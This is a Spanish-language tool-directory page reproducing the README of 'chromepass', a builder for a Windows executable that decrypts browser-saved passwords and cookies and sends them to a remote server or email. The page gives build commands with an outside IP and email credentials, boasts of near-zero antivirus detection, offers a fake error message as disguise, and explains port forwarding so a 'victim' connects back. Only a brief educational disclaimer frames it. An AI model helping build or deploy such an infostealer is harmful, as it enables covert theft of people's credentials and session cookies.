Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
chromepass — Chromepass - Hackeando contraseñas guardadas de Chrome | Kitploit
Herramientas/GitHubGitHub/darkarp/chromepass
Descifrado de ContraseñasExfiltración de DatosPhishingRed Teaming
GitHubdarkarp/chromepass

chromepass

Chromepass - Hackeando contraseñas guardadas de Chrome

Ver Repositorio
838111hace 4 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Chromepass - Hackeando contraseñas y cookies guardadas de Chrome

Release Build Status on CircleCI
Scrutinizer code quality (GitHub/Bitbucket)
GitHub issues GitHub closed issues

Ver demo · Reportar error · Solicitar función

Tabla de contenido

  • Acerca del proyecto
    • Detección AV
  • Primeros pasos
    • Requisitos previos
    • Instalación
  • Uso
  • Correo electrónico
  • Errores, fallos y solicitudes de funciones
  • Más información
  • Licencia
  • Demo

Acerca del proyecto

Chromepass es una aplicación de consola basada en Python que genera un ejecutable de Windows con las siguientes características:

  • Descifrar contraseñas guardadas y cookies de Google Chrome, Chromium, Edge, Brave, Opera y Vivaldi
  • Enviar un archivo con las combinaciones de usuario/contraseña y cookies de forma remota (servidor http o correo electrónico)
  • Indetectable por antivirus si se hace correctamente
  • Icono personalizado
  • Mensaje de error personalizado
  • Personalizar puerto

¡Detección AV!

La nueva metodología de construcción del cliente prácticamente garantiza una tasa de detección del 0%, incluso sin tácticas de evasión de antivirus. Si esto se vuelve falso en el futuro, se implementarán algunos métodos para mejorar la evasión de antivirus.

Un ejemplo de los últimos análisis (nota: en 10-12 horas pasamos de 0-2 detecciones a 32 detecciones, así que ejecuta el análisis en tus propias compilaciones):

  • VirusTotal Scan 1
  • VirusTotal Scan 2
  • VirusTotal Scan 3
  • VirusTotal Scan 4

Primeros pasos

Dependencias y requisitos

Esta es una aplicación muy simple que usa solo:

  • Python - Probado en Python 3.9+

Se recomienda realizar la instalación dentro de una máquina virtual Windows. Algunas partes del procedimiento de instalación pueden verse afectadas por configuraciones existentes. Esto fue probado en una VM limpia de Windows 10.

Instalación

¡Chromepass requiere Windows para compilar! El soporte para Linux y macOS podría agregarse pronto.

Clonar el repositorio:

root@kitploit:~
git clone https://github.com/darkarp/chromepass

Nota: Alternativamente a clonar el repositorio, puedes descargar la última versión, ya que el repositorio puede tener más errores.

Instalar las dependencias:

Las dependencias se verifican e instalan automáticamente, así que puedes ir directamente a Uso. Se recomienda que uses una VM limpia, solo para asegurarte de que no haya conflictos.

Si no tienes las dependencias y tu internet no es rápido, esto tomará un tiempo. Ve por un café.


Uso

Chromepass es muy sencillo. Empieza ejecutando:

root@kitploit:~
python create.py -h

Aparecerá una lista de opciones que se explican por sí mismas.

Ejecutarlo sin parámetros construirá el servidor y el cliente conectándose a 127.0.0.1.

Un ejemplo simple de una compilación:

root@kitploit:~
python create.py --ip 92.34.11.220 --error --message 'An Error has happened'

Después de crear el servidor y el cliente, asegúrate de que el servidor se esté ejecutando cuando se ejecute el cliente.

Las cookies y contraseñas se guardarán en archivos json en una nueva carpeta llamada data en el mismo directorio que el servidor, separadas por dirección IP.


Correo electrónico

Chromepass admite el envío de archivos por correo electrónico, aunque aún es experimental. Para habilitarlo, puedes usar la bandera --email al crear el servidor. Necesitarás dos cosas: un nombre de usuario (tu correo electrónico) y una contraseña (una contraseña de aplicación).

Para generar una contraseña de aplicación, debes ir a la configuración de tu cuenta (account settings) -> Security y habilitar la autenticación en dos pasos (¡requerido!).

Después de habilitar la autenticación en dos pasos, verás una nueva opción llamada App Passwords: 2-step-authentication

Haz clic allí, elige las opciones correspondientes y luego genera una contraseña: 2-step-authentication

Después de hacer clic en Generate, te dará la contraseña necesaria. Puedes usar el nombre de usuario y la contraseña directamente en el comando o simplemente colocarlos dentro del archivo config.ini, donde dice YOUR_USERNAME y YOUR_PASSWORD.

Ejemplo con credenciales en el comando

root@kitploit:~
python create.py --error --message 'An Error has happened' --email --username [email protected] --password qwertyuiopasdfghh

Si pones las credenciales en el archivo de configuración (verás dónde al abrir este archivo)

root@kitploit:~
python create.py --error --message 'An Error has happened' --email

Notas remotas

Si deseas usar esto en un escenario remoto, también debes realizar el reenvío de puertos (puerto 80 por defecto), para que cuando la víctima ejecute el cliente pueda conectarse al servidor en el puerto correcto.
Para obtener información más general, haz clic aquí. Si aún no estás satisfecho, realiza una búsqueda en Google.


Instalación manual de dependencias

La configuración automatizada es experimental. Por una u otra razón, la configuración podría fallar al instalar correctamente las dependencias. Si ese es el caso, debes instalarlas manualmente.
Afortunadamente, solo hay 2 dependencias:

  • Microsoft Visual C++ Build Tools (install with the recommended workflows)
  • Rustup

En lugar de las herramientas de compilación, también puedes instalar Visual Studio, pero ocupará más espacio.

Después de instalar correctamente las herramientas de compilación, simplemente puedes ejecutar rustup-init.exe desde el sitio web de Rustup.

Esto completa las dependencias necesarias y deberías estar listo.


Errores, fallos y solicitudes de funciones

Si encuentras un error o un fallo, repórtalo como un issue. Si deseas sugerir una función o una mejora, repórtalo en las páginas de issues.

Por favor, sigue las plantillas que se muestran al crear el issue.


Más información

Para acceder a una comunidad llena de aspirantes a expertos en seguridad informática, desde principiantes hasta veteranos experimentados, únete a nuestro servidor de Discord: WhiteHat Hacking

Si deseas contactarme, puedes hacerlo a través de: [email protected]


Descargo de responsabilidad

No soy responsable de lo que hagas con la información y el código proporcionados. Esto está destinado únicamente a fines profesionales o educativos.

Licencia

AGPL-3.0


Code Intelligence Status

Demo

til

Descargar herramienta